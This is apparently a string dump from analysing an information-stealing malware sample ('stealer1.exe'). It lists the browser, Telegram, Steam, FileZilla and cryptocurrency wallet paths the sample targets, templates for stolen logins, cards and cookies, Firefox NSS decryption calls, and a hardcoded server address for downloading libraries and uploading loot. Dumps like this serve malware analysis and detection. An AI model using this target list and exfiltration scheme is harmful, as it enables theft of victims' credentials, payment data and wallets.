- 0xa25037 (13): softokn3.dll
- 0xa25095 (12): nssdbm3.dll
- 0xa2524e (9): WN!ybu $h
- 0xa25291 (6): Y#F2:k
- 0xa252b8 (7): imeTick
- 0xa252ca (11): RequestGUID
- 0xa252d6 (39): &{C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
- 0xa252ff (11): ProcessName
- 0xa2530c (18): stealer1.exe[2956]
- 0xa25320 (15): CurrentThreadID
- 0xa25335 (11):
- NotifyType
- 0xa25344 (44): +wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0xa25375 (14):
- RemoteAddress
- 0xa25387 (12): SocketHandle
- 0xa2539a (12): LocalAddress
- 0xa253aa (14): DLLNotifyEvent
- 0xa253bb (14):
- ConnectHandle
- 0xa253d0 (15): Socket_IsSecure
- 0xa253e2 (15): Socket_DataSize
- 0xa253f8 (40): 'wStdNotifyParams_dll.TwiTimingInfosImpl
- 0xa25426 (15): RequestComplete
- 0xa2543c (15): ReceiveLastByte
- 0xa25451 (14):
- SendFirstByte
- 0xa25466 (14): DNSLookUpStart
- 0xa2547b (16): ReceiveFirstByte
- 0xa25492 (12): SendLastByte
- 0xa254a4 (10): StartTick
- 0xa254b5 (12): ConnectStart
- 0xa254c9 (12): qh.MemStream
- 0xa25604 (7): -VkTJ)<
- 0xa25697 (7): INlV9QC
- 0xa25951 (7): 9#(|F^9
- 0xa259fc (7): gkI_K5F
- 0xa25b88 (7): PZ(h9}
- 0xa25d34 (6): IZN|;n
- 0xa25f85 (8): 2R/D\RV4
- 0xa260d4 (6): Doc6NZ
- 0xa26775 (6): cICTSO
- 0xa26a6b (7): _].w<:
- 0xa26b02 (6): {ZC -Y
- 0xa26c74 (6): {\^
- R
- 0xa26e23 (7): HA7??oM
- 0xa26fd6 (7): jstY4#:
- 0xa2710a (6): s"d5#Z
- 0xa275aa (7): +XMQr$)
- 0xa27673 (8): {vS]\7h,
- 0xa277a0 (8): V^Rihet^
- 0xa279b1 (6): @tC_V$
- 0xa27d7b (12): freebl3.dll
- 0xa27dd8 (12): mozglue.dll
- 0xa27e35 (9): nss3.dll
- 0xa27e8f (13): softokn3.dll
- 0xa27eed (12): nssdbm3.dll
- 0xa27f34 (30): pAnalyzer_StdV7
- 0xa29b1d (6): Qkkbal
- 0xa46818 (50): NamedBuffer, mAH, Process $00000b8c, API $76d26b0e
- 0xa46898 (50): NamedBuffer, mAH, Process $00000b8c, API $76d26b0e
- 0xa468d8 (50): NamedBuffer, mAH, Process $00000b8c, API $7574129d
- 0xa46918 (50): NamedBuffer, mAH, Process $00000b8c, API $71ac0000
- 0xa4da58 (55): Software\IEInspectorSoft\HTTPAnalyzerStd\7.x\Properties
- 0xa5c028 (9): Disk full
- 0xa5c070 (7): January
- 0xa5c088 (8): February
- 0xa5c100 (6): August
- 0xa5c118 (9): September
- 0xa5c130 (7): October
- 0xa5c148 (8): November
- 0xa5c160 (8): December
- 0xa5c178 (6): Sunday
- 0xa5c190 (6): Monday
- 0xa5c1a8 (7): Tuesday
- 0xa5c1c0 (9): Wednesday
- 0xa5c1d8 (8): Thursday
- 0xa5c1f0 (6): Friday
- 0xa5c208 (8): Saturday
- 0xa5c220 (8): M/d/yyyy
- 0xa5c238 (9): h:mm AMPM
- 0xa5c550 (9): Exception
- 0xa5c568 (6): EAbort
- 0xa5c580 (11): EInOutError
- 0xa5c598 (9): EIntError
- 0xa5c5b0 (10): EDivByZero
- 0xa5c5c8 (11): ERangeError
- 0xa5c5e0 (10): EMathError
- 0xa5c5f8 (10): EInvalidOp
- 0xa5c610 (11): EZeroDivide
- 0xa5c628 (9): EOverflow
- 0xa5c640 (10): EUnderflow
- 0xa5c658 (10): EPrivilege
- 0xa5c670 (9): EControlC
- 0xa5c688 (11): EFOpenError
- 0xa5c6a0 (11): EFilerError
- 0xa5c6b8 (10): EReadError
- 0xa5c6d0 (11): EWriteError
- 0xa5c6e8 (10): EListError
- 0xa5c700 (10): EBitsError
- 0xa5c718 (7): EThread
- 0xa5c730 (9): EParseCSV
- 0xa5c7f0 (11): qh.IntfList
- 0xa5c820 (10): qh.HashMap
- 0xa5c880 (7): qh.List
- 0xa5c8f8 (10): qh.HashSet
- 0xa5ca30 (10): ws2_32.dll
- 0xa5ca78 (7): WSARecv
- 0xa5ca90 (11): wsock32.dll
- 0xa5caa8 (11): wsock32.dll
- 0xa5cac0 (11): secur32.dll
- 0xa5cb08 (11): wsock32.dll
- 0xa5cb20 (7): WSASend
- 0xa5cb38 (11): wsock32.dll
- 0xa5cb50 (10): ws2_32.dll
- 0xa5cb68 (10): ws2_32.dll
- 0xa5cb80 (10): ws2_32.dll
- 0xa5cb98 (9): SSL_write
- 0xa5cbb0 (7): WSARecv
- 0xa5cbc8 (10): ws2_32.dll
- 0xa5cbe0 (7): connect
- 0xa5cbf8 (7): WSASend
- 0xa5cc10 (11): secur32.dll
- 0xa5cc28 (10): ws2_32.dll
- 0xa5cc40 (10): ws2_32.dll
- 0xa5cc58 (10): ws2_32.dll
- 0xa5cc70 (11): getaddrinfo
- 0xa5cc88 (10): WSAConnect
- 0xa5cca0 (11): wininet.dll
- 0xa5ccb8 (8): SSL_read
- 0xa5cce8 (8): 2956.576
- 0xa5cd00 (10): NotifyType
- 0xa5cd30 (11): ProcessName
- 0xa5cd60 (8): TimeTick
- 0xa5cd78 (11): RequestGUID
- 0xa5cd90 (9): StartTick
- 0xa63358 (41): Variant or safe array index out of bounds
- 0xa63390 (36): Error creating variant or safe array
- 0xa64200 (39): wINetIPCMsgs.TwiWebPageNotifyParamsIMPL
- 0xa64270 (39): wStdNotifyParams_dll.TwiTimingInfosImpl
- 0xa642e0 (43): wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0xa644a0 (38): {C3FB5228-EBD8-45E5-AD48-1B5B2EC0AA24}
- 0xa64628 (43): wStdNotifyParams_dll.TwiDLLNotifyParamsImpl
- 0xa64820 (39): wStdNotifyParams_dll.TwiTimingInfosImpl
- 0xa6a688 (16): Assertion failed
- 0xa6a6a8 (16): Invalid argument
- 0xa6a6c8 (14): Stack overflow
- 0xa6a6e8 (13): Control-C hit
- 0xa6a708 (16): Access violation
- 0xa6a728 (16): Integer overflow
- 0xa6a748 (17): Range check error
- 0xa6a768 (16): Division by zero
- 0xa6a788 (18): File access denied
- 0xa6a7a8 (19): Too many open files
- 0xa6a7c8 (16): Invalid filename
- 0xa6a7e8 (14): File not found
- 0xa6a808 (13): Out of memory
- 0xa6a828 (14): Service Pack 1
- 0xa6a848 (19): dddd, MMMM dd, yyyy
- 0xa6a868 (12): h:mm:ss AMPM
- 0xa6a888 (15): TInvokableClass
- 0xa6a8a8 (15): TSoapDataModule
- 0xa6a8c8 (17): TSOAPDOMProcessor
- 0xa6a8e8 (12): THTTPReqResp
- 0xa6a908 (12): TXMLDocument
- 0xa6a948 (19): C:\Windows\system32
- 0xa6ab68 (12): EInvalidCast
- 0xa6aba8 (13): EConvertError
- 0xa6abe8 (13): EVariantError
- 0xa6ac28 (13): EPropReadOnly
- 0xa6ac68 (14): EPropWriteOnly
- 0xa6aca8 (16): EAssertionFailed
- 0xa6ace8 (14): EAbstractError
- 0xa6ad28 (14): EIntfCastError
- 0xa6ad68 (17): EInvalidContainer
- 0xa6ada8 (14): EInvalidInsert
- 0xa6ade8 (13): EPackageError
- 0xa6ae28 (18): ESafecallException
- 0xa6ae68 (18): EExternalException
- 0xa6af08 (12): EIntOverflow
- 0xa6afe8 (16): EAccessViolation
- 0xa6b048 (14): EStackOverflow
- 0xa6b0a8 (12): EStreamError
- 0xa6b0e8 (13): EFCreateError
- 0xa6b1a8 (14): EClassNotFound
- 0xa6b1e8 (15): EMethodNotFound
- 0xa6b228 (13): EInvalidImage
- 0xa6b268 (12): EResNotFound
- 0xa6b2e8 (16): EStringListError
- 0xa6b328 (15): EComponentError
- 0xa6b368 (12): EParserError
- 0xa6b3a8 (15): EOutOfResources
- 0xa6b3e8 (17): EInvalidOperation
- 0xa6b448 (13): EqhValidation
- 0xa6b488 (12): qh.MemStream
- 0xa6b4a8 (14): qh.IntfHashMap
- 0xa6b4c8 (13): qh.StringList
- 0xa6b4e8 (17): qh.VectorIterator
- 0xa6b508 (19): qh.IntfListIterator
- 0xa6b528 (14): qh.IntfHashSet
- 0xa6b568 (18): stealer1.exe[2956]
- 0xa6b5c8 (18): HttpAnalyzer_StdV7
- 0xa6b5e8 (19): HttpAnalyzer_StdV71
- 0xa6b608 (14): DecryptMessage
- 0xa6b628 (14): EncryptMessage
- 0xa6b648 (13): gethostbyname
- 0xa6b668 (16): InternetConnectA
- 0xa6b6a8 (12): ssleay32.dll
- 0xa6b6c8 (12): ssleay32.dll
- 0xa6b6e8 (12): kernel32.dll
- 0xa6b708 (15): HttpsSendBuffer
- 0xa6b7a8 (18): HttpAnalyzer_StdV7
- 0xa6b808 (12): LocalAddress
- 0xa6b828 (12): qh.MemStream
- 0xa6b848 (12): SocketHandle
- 0xa6b868 (14): DLLNotifyEvent
- 0xa6b888 (12): qh.MemStream
- 0xa6b8a8 (18): HttpAnalyzer_StdV7
- 0xa6b8c8 (13): RemoteAddress
- 0xa6b8e8 (19): \RPC Control\mchIpc
- 0xa6b908 (16): ReceiveFirstByte
- 0xa6b928 (15): ReceiveLastByte
- 0xa6b948 (15): RequestComplete
- 0xa6b968 (14): DNSLookUpStart
- 0xa6b988 (13): SendFirstByte
- 0xa6b9a8 (15): ReceiveLastByte
- 0xa6b9c8 (15): RequestComplete
- 0xa719b8 (23): Interface not supported
- 0xa719e0 (21): External exception %x
- 0xa71a08 (25): Invalid variant operation
- 0xa71a30 (22): Privileged instruction
- 0xa71a58 (22): Invalid class typecast
- 0xa71a80 (24): Floating point underflow
- 0xa71aa8 (23): Floating point overflow
- 0xa71ad0 (21): Invalid numeric input
- 0xa71af8 (23): Read beyond end of file
- 0xa71b20 (25): Invalid pointer operation
- 0xa721b0 (22): qh.StreamableException
- 0xa721d8 (20): qh.SimplePropertyBag
- 0xa72200 (24): wINetTypes.TwiNotifyImpl
- 0xa72340 (20): ws2_32.dll
- 0xa72390 (22): wsock32.dll
- 0xa723b8 (24): ssleay32.dll
- 0xa723e0 (22): wsock32.dll
- 0xa72408 (24): ssleay32.dll
- 0xa72430 (20): ws2_32.dll
- 0xa72458 (20): ws2_32.dll
- 0xa72480 (20): ws2_32.dll
- 0xa724a8 (20): ws2_32.dll
- 0xa724f8 (22): WSAGetOverlappedResult
- 0xa72520 (20): ws2_32.dll
- 0xa72548 (20): ws2_32.dll
- 0xa72570 (20): ws2_32.dll
- 0xa72598 (22): wininet.dll
- 0xa725c0 (22): secur32.dll
- 0xa725e8 (22): secur32.dll
- 0xa72610 (22): wsock32.dll
- 0xa72638 (22): wsock32.dll
- 0xa726b0 (25): GetQueuedCompletionStatus
- 0xa72700 (24): kernel32.dll
- 0xa72840 (20): ProcessIdToSessionId
- 0xa78ce8 (28): Exception in safecall method
- 0xa78d18 (34): Variant method calls not supported
- 0xa78d48 (31): Invalid variant type conversion
- 0xa78d78 (31): Floating point division by zero
- 0xa78da8 (32): Invalid floating point operation
- 0xa78f58 (35): wINetIPCMsgs.TwiDLLNotifyParamsImpl
- 0xa78f88 (35): wINetIPCMsgs.TwiLogNotifyParamsIMPL
- 0xb00850 (124): Global\BFE_Notify_Event_{97b51811-6670-4505-8b2a-5b63fedd33c9}
- 0xbc07ea (12): Psched
- 0xbc08e4 (12): Tcpip6
- 0xbc0b54 (40): MSAFD Tcpip [TCP/IP]
- 0xbc0b7e (42): 2\wshtcpip.dll,-60100
- 0xbc0dc8 (40): MSAFD Tcpip [UDP/IP]
- 0xbc0df2 (42): 2\wshtcpip.dll,-60101
- 0xbc103c (40): MSAFD Tcpip [RAW/IP]
- 0xbc1066 (42): 2\wshtcpip.dll,-60102
- 0xbc12b0 (44): MSAFD Tcpip [TCP/IPv6]
- 0xbc12de (34): wship6.dll,-60100
- 0xbc1524 (44): MSAFD Tcpip [UDP/IPv6]
- 0xbc1552 (34): wship6.dll,-60101
- 0xbc1798 (44): MSAFD Tcpip [RAW/IPv6]
- 0xbc17c6 (34): wship6.dll,-60102
- 0xbc1a0c (54): RSVP TCPv6 Service Provider
- 0xbc1a44 (20): s.dll,-100
- 0xbc1c80 (50): RSVP TCP Service Provider
- 0xbc1cb4 (24): qos.dll,-101
- 0xbc1ef4 (54): RSVP UDPv6 Service Provider
- 0xbc1f2c (20): s.dll,-102
- 0xbc2168 (50): RSVP UDP Service Provider
- 0xbc219c (24): qos.dll,-103
- 0xc64818 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
- 0xc648ea (14): Q!1AQaq
- 0xf701d8 (128): ! #!%"'#)$+%-&/'1(3)5*7+9,;-=.?/A0E1I2M3Q4U5Y6]7a8e9i:m;q<u=y>}?
- 0xf702aa (14): Q!1AQaq
- 0x1080864 (26): api.ipify.org
- 0x1080b78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080bf8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080c78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080cf8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080d78 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080df8 (86): 97307-934924932.us-east-1.elb.amazonaws.com
- 0x1080e78 (44): no-19599.herokussl.com
- 0x1080ec0 (94): elb097307-934924932.us-east-1.elb.amazonaws.com
- 0x1080f48 (18): ipify.org
- 0x1080f80 (52): nagano-19599.herokussl.com
- 0x2e6f26f (6): ws#
- ul
- 0x71b00025 (142): C:\Program Files (x86)\IEInspector\HTTPAnalyzerFullV7\HookWinSockV7.dll
- 0x71b00345 (6): 8LdrLu
- 0x7ffe0030 (20): d:\Windows
- Login: %s
- Password: %s
- templogin Login Data %s\%s templogin ERROR Don't copy string
- Amigo.txt %s\Amigo\User Data\Default a GOOGLE.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi.txt a %s\Yandex\YandexBrowser\User Data\Default %s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch.txt a Opera.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium.txt a Maxthon5.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 Epic.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc.txt a GOOGLE.txt %s\Google\Chrome\User Data\Profile 1 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE.txt %s\Google\Chrome\User Data\Profile 4 a Amigo.txt %s\Amigo\User Data\Profile 4 a Amigo.txt %s\Amigo\User Data\Profile 1 a Amigo.txt %s\Amigo\User Data\Profile 2 a Amigo.txt %s\Amigo\User Data\Profile 3 a %s a %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s Name Card: %s
- Expiration Month: %s
- Expiration Year: %s
- Number Card: %s
- Billing address id: %s
- Email: %s
- Number: %s
- First name: %s
- Middle name: %s
- Last name: %s
- Full name: %s
- Ñompany name: %s
- Street address: %s
- Dependent locality: %s
- City: %s
- State: %s
- Zipcode: %s
- a %s %s %s %s %s TRUE %s FALSE %s %s %s
- templogim Cookies %s\%s templogim templogik Web Data %s\%s templogik Amigo_Cookies.txt %s\Amigo\User Data\Default a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi_Cookies.txt a %s\Yandex\YandexBrowser\User Data\Default %s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex_Cookies.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa_Cookies.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum_Cookies.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo_Cookies.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch_Cookies.txt a Opera_Cookies.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu_Cookies.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler_Cookies.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium_Cookies.txt a Maxthon5_Cookies.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik_Cookies.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 Epic_Cookies.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc_Cookies.txt a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 1 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE_Cookies.txt %s\Google\Chrome\User Data\Profile 4 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 4 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 1 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 2 a Amigo_Cookies.txt %s\Amigo\User Data\Profile 3 a Amigo_CC.txt %s\Amigo\User Data\Default a GOOGLE_CC.txt %s\Google\Chrome\User Data\Default a %s\Vivaldi\User Data\Default %s\Vivaldi\User Data\Profile 1 %s\Vivaldi\User Data\Profile 2 %s\Vivaldi\User Data\Profile 3 Vivaldi_CC.txt a %s\Yandex\YandexBrowser\User Data\Default %s\Yandex\YandexBrowser\User Data\Profile 1 %s\Yandex\YandexBrowser\User Data\Profile 2 %s\Yandex\YandexBrowser\User Data\Profile 3 Yandex_CC.txt a %s\Kometa\User Data\Default %s\Kometa\User Data\Profile 1 %s\Kometa\User Data\Profile 2 %s\Kometa\User Data\Profile 3 Kometa_CC.txt a %s\Orbitum\User Data\Default %s\Orbitum\User Data\Profile 1 %s\Orbitum\User Data\Profile 2 %s\Orbitum\User Data\Profile 3 Orbitum_CC.txt a %s\Comodo\Dragon\User Data\Default %s\Comodo\Dragon\User Data\Profile 1 %s\Comodo\Dragon\User Data\Profile 2 %s\Comodo\Dragon\User Data\Profile 3 Comodo_CC.txt a %s\Torch\User Data\Default %s\Torch\User Data\Profile 1 %s\Torch\User Data\Profile 2 %s\Torch\User Data\Profile 3 Torch_CC.txt a Opera_CC.txt %s\Opera Software\Opera Stable a %s\Xpom\User Data\Default %s\Xpom\User Data\Profile 1 %s\Xpom\User Data\Profile 2 %s\Xpom\User Data\Profile 3 MailRu_CC.txt a %s\Nichrome\User Data\Default %s\Nichrome\User Data\Profile 1 %s\Nichrome\User Data\Profile 2 %s\Nichrome\User Data\Profile 3 rambler_CC.txt a %s\Chromium\User Data\Default %s\Chromium\User Data\Profile 1 %s\Chromium\User Data\Profile 2 %s\Chromium\User Data\Profile 3 Chromium_CC.txt a Maxthon5_CC.txt %s\Maxthon5\Users\guest a Login Data Web Data %s\Sputnik\Sputnik\User Data\Default %s\Sputnik\Sputnik\User Data\Profile 1 %s\Sputnik\Sputnik\User Data\Profile 2 %s\Sputnik\Sputnik\User Data\Profile 3 Sputnik_CC.txt a %s\Epic Privacy Browser\User Data\Default %s\Epic Privacy Browser\User Data\Profile 1 %s\Epic Privacy Browser\User Data\Profile 2 %s\Epic Privacy Browser\User Data\Profile 3 Epic_CC.txt a %s\CocCocBrowser\User Data\Default %s\CocCocBrowser\User Data\Profile 1 %s\CocCocBrowser\User Data\Profile 2 %s\CocCocBrowser\User Data\Profile 3 CocCoc_CC.txt a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 1 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 2 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 3 a GOOGLE_CC.txt %s\Google\Chrome\User Data\Profile 4 a Amigo_CC.txt %s\Amigo\User Data\Profile 4 a Amigo_CC.txt %s\Amigo\User Data\Profile 1 a Amigo_CC.txt %s\Amigo\User Data\Profile 2 a Amigo_CC.txt %s\Amigo\User Data\Profile 3 a SOFTWARE\Mozilla\Mozilla Firefox CurrentVersion SOFTWARE\Mozilla\Mozilla Firefox Main \ Install Directory Path Profile0 \ logins result.txt %s %s a URL: %s
- Login: %s
- Password: %s
- hostname %s encryptedUsername encryptedPassword result.txt a URL: %s
- Login: %s
- Password: %s
- %s\%s SELECT * FROM moz_logins; PATH ; PATH= nss3.dll NSS_Init NSS_Shutdown PL_ArenaFinish PR_Cleanup PK11_GetInternalKeySlot PK11_FreeSlot PK11SDR_Decrypt 32.zip http://141.105.71.82/Libs.zip wb result.txt C:\Program Files\Mozilla Firefox\firefox.exe a FireFox
- %s\Mozilla\Firefox\profiles.ini %s\Mozilla\Firefox\%s C:\Program Files\Waterfox\waterfox.exe a Waterfox
- %s\Waterfox\profiles.ini %s\Waterfox\%s C:\Program Files\Pale Moon\palemoon.exe a Pale Moon
- %s\Moonchild Productions\Pale Moon\profiles.ini %s\Moonchild Productions\Pale Moon\%s C:\Program Files\Cyberfox\Cyberfox.exe a Cyberfox
- %s\8pecxstudios\Cyberfox\profiles.ini %s\8pecxstudios\Cyberfox\%s C:\Program Files\NETGATE\Black Hawk\blackhawk.exe a BlackHawk
- %s\NETGATE Technologies\BlackHawk\profiles.ini %s\NETGATE Technologies\BlackHawk\%s a K-Meleon
- %s\K-Meleon\profiles.ini %s\K-Meleon\%s ERROR Don't copy string
- C:\ Error Unable to Allocate Bitmap Memory wb Error Unable to Create Bitmap File D://prosto.bmp S o f t w a r e \ C l a s s e s \ t d e s k t o p . t g \ D e f a u l t I c o n SteamPath S o f t w a r e \ V a l v e \ S t e a m Telegram.exe tdata\D877F783D5D3EF8C1 tdata\D877F783D5D3EF8C0 tdata\D877F783D5D3EF8C\map1 tdata\D877F783D5D3EF8C\map0 Telegram\D877F783D5D3EF8C1 Telegram\D877F783D5D3EF8C0 Telegram\D877F783D5D3EF8C\map1 Telegram\D877F783D5D3EF8C\map0 %Y-%m-%d %H-%M-%S body.out https://api.ipify.org wb r .zip \Steam.exe \ssfn* \ \Config\*.* \Config\ browser\GOOGLE.txt GOOGLE.txt browser\Amigo.txt Amigo.txt browser\Vivaldi.txt Vivaldi.txt browser\YandexBrowser.txt YandexBrowser.txt browser\Kometa.txt Kometa.txt browser\Orbitum.txt Orbitum.txt browser\Comodo.txt Comodo.txt browser\Torch.txt Torch.txt browser\MailRu.txt MailRu.txt browser\rambler.txt rambler.txt browser\Chromium.txt Chromium.txt browser\Sputnik.txt Sputnik.txt browser\Epic.txt Epic.txt browser\CocCoc.txt CocCoc.txt browser\Opera.txt Opera.txt browser\Maxthon5.txt Maxthon5.txt browser\firefox.txt result.txt CC\GOOGLE_CC.txt GOOGLE_CC.txt CC\Amigo_CC.txt Amigo_CC.txt CC\Vivaldi_CC.txt Vivaldi_CC.txt CC\YandexBrowser_CC.txt Yandex_CC.txt CC\Kometa_CC.txt Kometa_CC.txt CC\Orbitum_CC.txt Orbitum_CC.txt CC\Comodo_CC.txt Comodo_CC.txt CC\Torch_CC.txt Torch_CC.txt CC\MailRu_CC.txt MailRu_CC.txt CC\rambler_CC.txt rambler_CC.txt CC\Chromium_CC.txt Chromium_CC.txt CC\Sputnik_CC.txt Sputnik_CC.txt CC\Epic_CC.txt Epic_CC.txt CC\CocCoc_CC.txt CocCoc_CC.txt CC\Opera_CC.txt Opera_CC.txt CC\Maxthon5_CC.txt Maxthon5_CC.txt Cookies\GOOGLE_Cookies.txt GOOGLE_Cookies.txt Cookies\Amigo_Cookies.txt Amigo_Cookies.txt Cookies\Vivaldi_Cookies.txt Vivaldi_Cookies.txt Cookies\YandexBrowser_Cookies.txt Yandex_Cookies.txt Cookies\Kometa_Cookies.txt Kometa_Cookies.txt Cookies\Orbitum_Cookies.txt Orbitum_Cookies.txt Cookies\Comodo_Cookies.txt Comodo_Cookies.txt Cookies\Torch_Cookies.txt Torch_Cookies.txt Cookies\MailRu_Cookies.txt MailRu_Cookies.txt Cookies\rambler_Cookies.txt rambler_Cookies.txt Cookies\Chromium_Cookies.txt Chromium_Cookies.txt Cookies\Sputnik_Cookies.txt Sputnik_Cookies.txt Cookies\Epic_Cookies.txt Epic_Cookies.txt Cookies\CocCoc_Cookies.txt CocCoc_Cookies.txt Cookies\Opera_Cookies.txt Opera_Cookies.txt Cookies\Maxthon5_Cookies.txt Maxthon5_Cookies.txt \ \*.txt \*.pfx No files
- Steam\ No files in current directory!
- Steam\Config\ \Armory\ \Armory\*.* \Dash\ \DashCore\*.dat \Bitcoin\wallets\ \Bitcoin\wallets\*.dat \Litecoin\wallets\ \Litecoin\wallets\*.dat \Monero\wallets\ \ *.keys \Doge\ \MultiDoge\*.wallet \Electrum\wallets\ \Electrum\wallets\*.dat \mSIGNA_Bitcoin\wallets\ \mSIGNA_Bitcoin\wallets\*.dat \Ethereum\keystore\ \Ethereum\keystore\* \FileZilla\recentservers.xml FileZilla\recentservers.xml No files in current directory!
- ethereum\ No files in current directory!
- mSIGNA\ No files in current directory!
- Electrum\ No files in current directory!
- Bitcoin\wallets\ No files in current directory!
- Armory\ No files in current directory!
- Dash\ No files in current directory!
- Litecoin\ No files in current directory!
- Doge\ No files in current directory!
- Doge\ No files in current directory!
- txt\ No files in current directory!
- Sertificate\ file af3c4c9f-8ea3-413f-af4b-5700ee9157bc id http://141.105.71.82/Upload/ 32.zip result.txt mozglue.dll nss3.dll nssdbm3.dll softokn3.dll freebl3.dll result_cookies.txt result_CC.txt GOOGLE.txt Amigo.txt Vivaldi.txt Yandex.txt Kometa.txt Orbitum.txt Comodo.txt Torch.txt mailru.txt rambler.txt Chromium.txt Sputnik.txt Epic.txt CocCoc.txt Opera.txt Maxthon5.txt result.txt GOOGLE_CC.txt Amigo_CC.txt Vivaldi_CC.txt Yandex_CC.txt Kometa_CC.txt Orbitum_CC.txt Comodo_CC.txt Torch_CC.txt mailru_CC.txt rambler_CC.txt Chromium_CC.txt Sputnik_CC.txt Epic_CC.txt CocCoc_CC.txt Opera_CC.txt Maxthon5_CC.txt result_CC.txt GOOGLE_Cookies.txt Amigo_Cookies.txt Vivaldi_Cookies.txt Yandex_Cookies.txt Kometa_Cookies.txt Orbitum_Cookies.txt Comodo_Cookies.txt Torch_Cookies.txt mailru_Cookies.txt rambler_Cookies.txt Chromium_Cookies.txt Sputnik_Cookies.txt Epic_Cookies.txt CocCoc_Cookies.txt Opera_Cookies.txt Maxthon5_Cookies.txt result_Cookies.txt body.out r c : \ u s e r s \ i g o r 1 \ d e s k t o p \ b r o w s e r - d u m p w d - m a s t e r \ m i s c . c i d x < c o u n t c : \ u s e r s \ i g o r 1 \ d e s k t o p \ b r o w s e r - d u m p w d - m a s t e r \ m i s c . c i d x = = c o u n t - 1 |L €|L -0 xX r 